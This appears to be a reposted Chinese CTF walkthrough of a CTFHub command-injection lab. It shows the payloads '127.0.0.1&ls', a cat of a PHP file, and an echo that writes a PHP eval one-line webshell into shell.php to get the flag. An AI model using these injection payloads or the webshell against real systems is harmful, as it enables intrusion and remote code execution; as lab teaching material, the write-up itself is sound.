码上欢乐
相关内容   简体   繁体

ctfhub技能树—RCE—命令注入

本文转载自  查看原文  2020-03-18 11:23  1722    CTF

打开靶机

查看页面信息

输入127.0.0.1进行测试

构造payload

127.0.0.1&ls

查看文件内容信息

127.0.0.1 & cat 179852221619745.php



没有反应......

利用命令执行写入一句话木马

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php



成功拿到flag


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 CTFHub web技能树之RCE初步 命令注入+过滤cat CTFHub题解-技能树-Web-RCE【命令注入、过滤cat、过滤空格】(一) CTFHub web技能树 RCE ctfhub技能树—RCE—过滤空格 ctfhub技能树—RCE—综合过滤练习 ctfhub技能树—RCE—过滤cat ctfhub技能树—sql注入—报错注入 ctfhub技能树—sql注入—Refer注入 ctfhub技能树—sql注入—Cookie注入 ctfhub技能树—sql注入—UA注入
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM